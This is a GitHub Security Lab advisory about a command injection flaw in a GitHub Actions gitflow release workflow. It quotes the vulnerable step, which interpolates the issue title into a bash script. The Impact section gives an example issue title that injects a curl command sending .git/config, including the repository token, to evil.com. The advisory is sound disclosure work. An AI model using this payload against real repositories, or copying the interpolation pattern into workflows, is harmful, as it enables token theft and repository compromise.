GHSL-2020-186: Command injection in thomaseizinger/github-action-gitflow-release-workflow

Coordinated Disclosure Timeline

• 10/16/2020: Report sent to vendor
• 10/17/2020: Issue fixed

Summary

The ‘draft-new-release.yml’ GitHub workflow is potentially vulnerable to arbitrary command injection, that may lead to the repository being compromised.

Product

thomaseizinger/github-action-gitflow-release-workflow GitHub repository

Tested Version

draft-new-release.yml from the dev branch.

Details

Issue: The body of a public GitHub issue is used to format a shell command

When a user creates a public issue that begins with Release version it automatically starts the draft-new-release.yml GitHub workflow. The title of the issue is used to format a bash script.

# Only run for issues with a specific title and label. Not strictly required but makes finding the release issue again later easier.
# There is also a whitelist that you may want to use to restrict, who can trigger this workflow.
# Unfortunately, we cannot create an array on the fly, so the whitelist is just comma-separated.
if: startsWith(github.event.issue.title, 'Release version') && contains(github.event.issue.labels.*.name, 'release') && contains('thomaseizinger,yourusername', github.event.issue.user.login)
steps:
    - uses: actions/checkout@v2

    - name: Extract version from issue title
    run: |
        TITLE="${{ github.event.issue.title }}"
        VERSION=${TITLE#Release version }

There are two safeguards to prevent random users from triggering the workflow: user login name check and label check.
The login name is bypassable with any user name that is a substring of thomaseizinger,yourusername. Like eizi, thom, etc.
The label check is the only one that prevents exploitation, but it may be removed accidentally in the future. There is even a comment that indicates it is Not strictly required.

Impact

This vulnerability allows for arbitrary command injection into the bash script. For example a user may create an issue with the title Release version"; curl -d @.git/config http://evil.com; sleep 10 # which will exfiltrate the temporary GitHub repository authorization token to the attacker controlled server. Although the token is not valid after the workflow finishes, since the attacker controls the execution of the workflow he or she can delay it to give the malicious server time to modify the repository.

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-186 in any communication regarding this issue.